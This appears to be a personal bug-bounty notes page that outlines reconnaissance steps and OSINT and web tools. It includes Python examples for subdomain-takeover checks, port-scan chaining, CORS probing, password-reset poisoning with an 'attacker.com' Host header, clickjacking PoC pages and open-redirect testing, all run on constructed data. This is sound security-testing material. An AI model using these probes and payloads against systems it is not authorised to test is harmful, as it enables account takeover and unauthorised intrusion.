Bug Bounty Path
This is a start on documenting my process. The goal is automation... maybe.
MITRE ATT&CK: Reconnaissance (TA0043)
Reconnaissance consists of techniques that involve adversaries actively or passively gathering in...
Active Scanning
Consists of: Scanning IP Blocks, Vulnerability Scanning, Wordlist Scanning. Gather ...
Gathering Host Information
Gather Identity Information
Gather Network Information
Gather Org Information
Open Technical Information
References
https://attack.mitre.org/
https://attack.mitre.org/tactics/TA0043/
Technical OSINT Tools
Open-source intelligence (OSINT) is the collection and analysis of data gathered from open source...
What is OSINT?
OSINT stands for open source intelligence. The “open source” part refers to publicly available...
Tools
OSINT: Shodan, Maltego, Google Dorks, Recon-ng, Ahmia.fi, Wayback Machine, theHarvester, TinEye...
Shodan
Shodan is a search engine of publicly accessible (or at least discoverable) network devices on the internet...
Huntr
https://huntr.dev/ We fund open source security. We pay security researchers for finding vulner...
HackerOne
https://hackerone.com/bug-bounty-programs Bug Bounty Programs Bug bounty programs offer monetar...
Maltego
https://www.maltego.com/ Maltego is an open source intelligence and graphical link analysis tool...
Recon-ng Framework
https://github.com/lanmaster53/recon-ng Recon-ng is a full-featured reconnaissance framework des...
Ahmia.fi
Tor search engine; out of scope for this round.
Wayback Machine
theHarvester
https://github.com/laramies/theHarvester theHarvester is a simple to use, yet powerful tool desi...
TinEye
https://tineye.com/ for researching images online. If you have an image on your local device, yo...
OSINT Framework
https://osintframework.com/ OSINT framework focused on gathering information from free tools or ...
Find Subdomains
DNS, HackerOne, fuzzing, and the like.
FFUF Tool
https://github.com/ffuf/ffuf ffuf - Fuzz Faster U Fool A fast web fuzzer written in Go. I...
Lepus Tool
Lepus is a tool for enumerating subdomains, checking for subdomain takeovers and perform port sca...
tomnomnom tools in Rengine
https://github.com/tomnomnom/gf The examples are GREAT!!!!!! gf A wrapper around grep to avo...
theFuzz (formerly known as fuzzywuzzy)
https://github.com/seatgeek/thefuzz TheFuzz Fuzzy string matching like a boss. It uses Levensht...
Name Service Takeover
Look for takeover
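What "look for takeover" means in practice: a subdomain whose CNAME points at a third-party service that no longer has the resource claimed. Lepus above automates this; the following is an added example of the core check, not code from Lepus or any other tool. The DNS/HTTP observations are constructed sample data, and the fingerprint table is illustrative (assumed for the example; re-verify each service's current "unclaimed" response before reporting anything):

```python
"""Flag dangling CNAMEs as subdomain-takeover candidates (added example)."""

# Illustrative fingerprints: CNAME suffix of a third-party service -> body text
# that service returns for an unclaimed resource. Assumed for this example;
# check each service's current behaviour before relying on a match.
FINGERPRINTS = {
    "github.io": "There isn't a GitHub Pages site here",
    "herokuapp.com": "No such app",
    "s3.amazonaws.com": "NoSuchBucket",
}

# Constructed observations, as a resolve-then-fetch pass would collect them.
# cname=None: no CNAME record; body=None: the HTTP fetch failed (NXDOMAIN, timeout).
CONSTRUCTED_OBSERVATIONS = [
    {"name": "blog.example.com", "cname": "acme-blog.github.io.",
     "body": "<h1>There isn't a GitHub Pages site here.</h1>"},
    {"name": "www.example.com", "cname": "example.herokuapp.com.",
     "body": "<html>Welcome</html>"},
    {"name": "assets.example.com", "cname": "acme-assets.s3.amazonaws.com.",
     "body": "<Code>NoSuchBucket</Code>"},
    {"name": "mail.example.com", "cname": None, "body": None},
    {"name": "old.example.com", "cname": "old-site.herokuapp.com.", "body": None},
]


def takeover_candidates(observations):
    """Return candidates with a confidence level.

    high: CNAME targets a known service AND the body carries its "unclaimed" marker.
    low:  CNAME targets a known service but nothing answered; resolve the CNAME
          target by hand (NXDOMAIN there is the classic dangling-record signal).
    """
    out = []
    for obs in observations:
        cname = (obs["cname"] or "").rstrip(".").lower()
        if not cname:
            continue
        for suffix, marker in FINGERPRINTS.items():
            if not cname.endswith("." + suffix):
                continue
            body = obs["body"]
            if body is not None and marker.lower() in body.lower():
                out.append({"name": obs["name"], "cname": cname, "service": suffix,
                            "confidence": "high", "evidence": marker})
            elif body is None:
                out.append({"name": obs["name"], "cname": cname, "service": suffix,
                            "confidence": "low", "evidence": "target unreachable"})
            break  # one service per CNAME
    return out


if __name__ == "__main__":
    for c in takeover_candidates(CONSTRUCTED_OBSERVATIONS):
        print(c["confidence"], c["name"], "->", c["cname"], c["evidence"])
```

A name with a live CNAME and a normal body (www.example.com in the sample) is correctly ignored; only an explicit "unclaimed" marker, or a CNAME to a known service that does not answer at all, gets reported.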
Wayback for URLS
End Point Discovery
Port Scanning
nmap, masscan
NMAP
Nmap is short for “Network Mapper” and was originally released in September 1997 by Gordon Lyon...
MASSCAN: Mass IP port scanner
GitHub project https://github.com/robertdavidgraham/masscan Overview This is an Internet-scal...
Naabu (in Rengine)
Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in...
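The usual split is masscan (or naabu) for fast discovery and nmap for service detection on only the ports found. An added example of that glue, not code from the masscan or nmap projects: it parses masscan's `-oL` list output and emits one nmap command per host. The scan lines are constructed sample data, and the nmap flags (`-sV -sC`) are my usual choice rather than anything the page prescribes:

```python
"""Turn masscan -oL output into per-host nmap service scans (added example)."""
import ipaddress
import shlex
from collections import defaultdict

# Constructed sample of masscan "-oL" (list) output; not a real scan.
SAMPLE_MASSCAN_LIST = """#masscan
open tcp 443 203.0.113.10 1700000000
open tcp 22 203.0.113.10 1700000001
open tcp 8080 203.0.113.25 1700000002
open udp 161 203.0.113.25 1700000003
# end
"""


def parse_masscan_list(text):
    """Return {ip: {"tcp": set(ports), "udp": set(ports)}} from -oL text.

    Each record is "<state> <proto> <port> <ip> <timestamp>"; '#' lines are the
    header/trailer. Only 'open' records are kept.
    """
    hosts = defaultdict(lambda: {"tcp": set(), "udp": set()})
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) < 4 or parts[0] != "open":
            continue
        proto, port, ip = parts[1], parts[2], parts[3]
        if proto not in ("tcp", "udp") or not port.isdigit():
            continue
        ipaddress.ip_address(ip)  # raises on a corrupt line instead of scanning garbage
        hosts[ip][proto].add(int(port))
    return dict(hosts)


def nmap_commands(hosts, extra_args=("-sV", "-sC")):
    """One nmap command per host, port list restricted to what masscan saw.

    UDP ports need -sU, and -sU on its own drops the TCP scan, so -sS is added
    next to it whenever a host has UDP ports.
    """
    def ip_key(a):
        addr = ipaddress.ip_address(a)
        return (addr.version, addr)

    cmds = []
    for ip in sorted(hosts, key=ip_key):
        tcp, udp = sorted(hosts[ip]["tcp"]), sorted(hosts[ip]["udp"])
        spec = []
        if tcp:
            spec.append("T:" + ",".join(map(str, tcp)))
        if udp:
            spec.append("U:" + ",".join(map(str, udp)))
        args = ["nmap", *extra_args]
        if udp:
            args += ["-sS", "-sU"]
        args += ["-p", ",".join(spec), ip]
        cmds.append(shlex.join(args))  # quoted, so safe to paste into a shell
    return cmds


if __name__ == "__main__":
    for cmd in nmap_commands(parse_masscan_list(SAMPLE_MASSCAN_LIST)):
        print(cmd)
```

Run masscan with `-oL scan.lst`, feed that file to `parse_masscan_list`, and execute the printed commands; nmap then spends its time on service fingerprinting rather than re-sweeping 65k ports per host.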
GitHub Recon
What is it and how do you do it?
WebApps Opportunities
Focus on Web Applications Vulnerabilities
Cross-origin resource sharing (CORS)
Cross-origin resource sharing (CORS) Cross-origin resource sharing (CORS) is a browser mechan...
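The test is the same each time: send a request with a chosen Origin and see what the server echoes in Access-Control-Allow-Origin and Access-Control-Allow-Credentials. An added example (mine, not from PortSwigger or any tool) of the probe set worth sending and how to classify each reply; `evil.example` is an assumed attacker domain and the responses are constructed to imitate a server that validates Origin with an endswith() check:

```python
"""Probe origins and verdicts for a CORS review (added example)."""
from urllib.parse import urlsplit


def probe_origins(target_url, attacker_domain="evil.example"):
    """Origin values to send, each aimed at a different weak validation pattern.

    attacker_domain is an assumed placeholder; use one you control when testing.
    """
    host = urlsplit(target_url).hostname
    return {
        "arbitrary": f"https://{attacker_domain}",      # server echoes anything
        "null": "null",                                 # sandboxed iframe / data: URL
        "suffix": f"https://{host}.{attacker_domain}",  # passes startswith(trusted)
        "prefix": f"https://evil{host}",                # passes endswith(trusted)
        "scheme": f"http://{host}",                     # trusted host, plaintext scheme
    }


def assess_cors(sent_origin, headers):
    """Classify one response to a request that carried Origin: sent_origin."""
    h = {k.lower(): v.strip() for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors-headers"
    if acao == "*":
        # Browsers refuse credentialed reads from a literal '*', so this only
        # matters for data that is sensitive without cookies (IP-gated APIs etc.).
        return "wildcard"
    if acao != sent_origin:
        return "not-reflected"
    if not creds:
        return "reflected-no-credentials"
    if sent_origin == "null":
        return "null-origin-with-credentials"
    return "reflected-with-credentials"


def triage(target_url, responses):
    """responses: {probe_name: response_header_dict} -> {probe_name: verdict}."""
    origins = probe_origins(target_url)
    return {name: assess_cors(origins[name], hdrs) for name, hdrs in responses.items()}


# Constructed responses for https://api.example.com/user from a server whose
# check is origin.endswith("api.example.com"): prefix and scheme probes slip through.
CONSTRUCTED_RESPONSES = {
    "arbitrary": {"Content-Type": "application/json"},
    "null": {"Content-Type": "application/json"},
    "suffix": {"Content-Type": "application/json"},
    "prefix": {"Access-Control-Allow-Origin": "https://evilapi.example.com",
               "Access-Control-Allow-Credentials": "true"},
    "scheme": {"Access-Control-Allow-Origin": "http://api.example.com",
               "Access-Control-Allow-Credentials": "true"},
}

if __name__ == "__main__":
    for name, verdict in triage("https://api.example.com/user", CONSTRUCTED_RESPONSES).items():
        print(f"{name:10} {verdict}")
```

"reflected-with-credentials" on any probe other than the site's own origin is the reportable case: an attacker page at that origin can read the authenticated response. "reflected-no-credentials" is usually only a finding if the endpoint exposes something without cookies.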
Password Reset Vulnerability
Password reset poisoning is a technique whereby an attacker manipulates a vulnerable website into...
SNMP and HOST Header Injection
How to Test: Initial testing is as simple as supplying another domain (e.g. attacker.com) i...
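To make the mechanism concrete, here is an added example (not from the page's sources) of the server-side bug beside its fix, plus the tester-side check on the link that arrives. The canonical host `app.example.com`, the token values and the request headers are all assumed:

```python
"""Password reset poisoning: vulnerable link builder next to a hardened one (added example)."""
from urllib.parse import urlsplit

CANONICAL_HOST = "app.example.com"   # assumed: the site's real public host
ALLOWED_HOSTS = {CANONICAL_HOST}


def _headers(req):
    """Case-insensitive view of a request header dict."""
    return {k.lower(): v.strip() for k, v in req.items()}


def reset_link_vulnerable(request_headers, token):
    """Builds the emailed link from the request's own Host / X-Forwarded-Host.

    Whatever host the attacker supplies lands in the victim's mailbox, and the
    token is sent to that host when the victim clicks.
    """
    h = _headers(request_headers)
    host = h.get("x-forwarded-host") or h["host"]
    return f"https://{host}/reset?token={token}"


def reset_link_hardened(request_headers, token):
    """Rejects unknown Host values and never derives the link from the request."""
    h = _headers(request_headers)
    host = h.get("host", "").split(":")[0].lower()   # drop an explicit port
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted Host header: {h.get('host')!r}")
    return f"https://{CANONICAL_HOST}/reset?token={token}"


def link_is_poisoned(link, allowed_hosts=ALLOWED_HOSTS):
    """Tester-side check on the received link: does it point off-site?"""
    return urlsplit(link).hostname not in allowed_hosts


if __name__ == "__main__":
    attacker = {"Host": "attacker.com"}
    link = reset_link_vulnerable(attacker, "t0k")
    print(link, "poisoned" if link_is_poisoned(link) else "clean")
```

When testing, request a reset for an account you own with the Host (and X-Forwarded-Host, since many apps honour it behind a proxy) set to a domain you control; if the mail's link carries your domain, the token will be delivered to your server when clicked.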
Clickjacking via IFRAME
Clickjacking is an attack that tricks a user into clicking a webpage element which is invisible o...
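Whether a page can be framed is decided by two response headers, and a PoC is a page that frames it under a decoy. An added example (mine, not from the page's sources) of reading those headers the way a browser does, and of generating the PoC page; the header values and target URL are constructed:

```python
"""Does a response permit framing? Plus the PoC page to confirm it (added example)."""
import html


def frame_protection(headers):
    """Return (verdict, reason) with verdict 'protected' or 'frameable'.

    frame-ancestors wins over X-Frame-Options when both are present (browsers
    ignore XFO in that case), so the CSP directive is checked first.
    """
    h = {k.lower(): v for k, v in headers.items()}
    csp = h.get("content-security-policy", "")   # Report-Only variants enforce nothing
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() != "frame-ancestors":
            continue
        sources = value.split()
        if "*" in sources or "http:" in sources or "https:" in sources:
            return "frameable", f"frame-ancestors allows any origin: {value!r}"
        return "protected", f"frame-ancestors {value}"
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return "protected", f"X-Frame-Options {xfo}"
    if xfo.startswith("ALLOW-FROM"):
        return "frameable", "ALLOW-FROM is not honoured by current browsers"
    return "frameable", "no X-Frame-Options and no frame-ancestors"


def poc_page(target_url, opacity=0.3):
    """Minimal clickjacking PoC: the target framed, semi-transparent, over a decoy.

    Raise opacity to 1.0 to align the decoy with the real button, then lower it
    again for the final demonstration.
    """
    url = html.escape(target_url, quote=True)
    return f"""<!doctype html>
<html><body>
<p>Framed target: {url}</p>
<div style="position:relative;width:800px;height:600px">
  <button style="position:absolute;top:300px;left:350px;z-index:1">Click me</button>
  <iframe src="{url}" style="position:absolute;top:0;left:0;width:800px;height:600px;opacity:{opacity};z-index:2"></iframe>
</div>
</body></html>
"""


if __name__ == "__main__":
    print(frame_protection({"Content-Security-Policy": "frame-ancestors 'none'"}))
    print(poc_page("https://app.example.com/settings"))
```

Paste the response headers from Burp into `frame_protection`; if it says frameable, serve `poc_page()` locally and check that the frame actually renders, since JavaScript frame-busting (which this header check ignores) can still block it.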
Access Controls and Parameter Tampering
Burp Proxy History for endpoint discovery
Arjun for hidden end point discovery
CSRF Discovery/Detection
SSRF Parameter Detection/Discovery
XSS and SSTI Discovery/Detection
Rate Limits
Directory Brute-Force
HTTP Request Smuggling
Open Redirect via WaybackURLs
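The Wayback/gau dump is only useful once it is filtered: what you want is each endpoint with a parameter that looks like a destination, rewritten to point at a host you control. An added example (mine, not gau's or gf's) of that filter; the URL list is constructed to resemble gau output, `canary.example` is an assumed listener host, and the parameter-name hints are a heuristic list, not a standard:

```python
"""Pick open-redirect candidates out of a gau/waybackurls URL dump (added example)."""
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Parameter-name fragments that usually carry a destination (heuristic, not exhaustive).
REDIRECT_HINTS = ("redirect", "redir", "url", "next", "return", "goto", "dest",
                  "continue", "target", "rurl", "forward", "callback", "link")

# Constructed sample of what `gau app.example.com` might print; not real data.
CONSTRUCTED_URLS = [
    "https://app.example.com/login?next=/dashboard",
    "https://app.example.com/login?next=/settings",
    "https://app.example.com/logout?returnTo=https://app.example.com/",
    "https://app.example.com/static/app.js",
    "https://app.example.com/search?q=test",
    "http://app.example.com/sso?client_id=abc&redirect_uri=https://app.example.com/cb",
]


def looks_like_redirect_param(name):
    n = name.lower().replace("-", "_")
    return any(hint in n for hint in REDIRECT_HINTS)


def redirect_candidates(urls, canary="https://canary.example/"):
    """One test URL per (endpoint, redirect-looking parameter), deduplicated.

    The canary is an assumed placeholder: point it at a host you control, and a
    3xx Location or meta refresh that lands there confirms the redirect.
    """
    seen, out = set(), []
    for raw in urls:
        u = urlsplit(raw.strip())
        params = parse_qsl(u.query, keep_blank_values=True)
        targets = [n for n, _ in params if looks_like_redirect_param(n)]
        if not targets:
            continue
        key = (u.netloc, u.path, tuple(sorted(n for n, _ in params)))
        if key in seen:          # same endpoint with other values adds nothing
            continue
        seen.add(key)
        for name in targets:
            q = urlencode([(n, canary if n == name else v) for n, v in params])
            out.append({
                "param": name,
                "original": raw,
                "test_url": urlunsplit((u.scheme, u.netloc, u.path, q, "")),
            })
    return out


if __name__ == "__main__":
    for c in redirect_candidates(CONSTRUCTED_URLS):
        print(c["param"], c["test_url"])
```

Feed the output through a request loop (or into ffuf) and keep only responses whose Location header or body contains the canary host; parameters that only accept relative paths will need the usual bypass variants (`//canary.example`, `/\canary.example`, `https:canary.example`) tried next.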
Social-SignOn Bypass
Possible DoS via multiple cookie injection
File Upload via CSRF, XSS, SSRF, RCE, LFI, XXE
HTB writeup: https://whitehatlab.eu/en/blog/writeup/hackthebox/machine/linux/doctor/
Buffer Overflow
WebApp Tools
AMASS (in Rengine?)
https://github.com/owasp-amass/amass The OWASP Amass Project performs network mapping of attack ...
Nuclei (in Rengine)
https://github.com/projectdiscovery/nuclei Nuclei is used to send requests across targets based ...
GoSpider
https://github.com/jaeles-project/gospider GoSpider GoSpider - Fast web spider written in Go
gau (get all urls)
https://github.com/lc/gau (replaces Rengine's https://github.com/bp0lr/gauplus) getallu...
Nikto
https://github.com/sullo/nikto Nikto is an Open Source (GPL) web server scanner which performs c...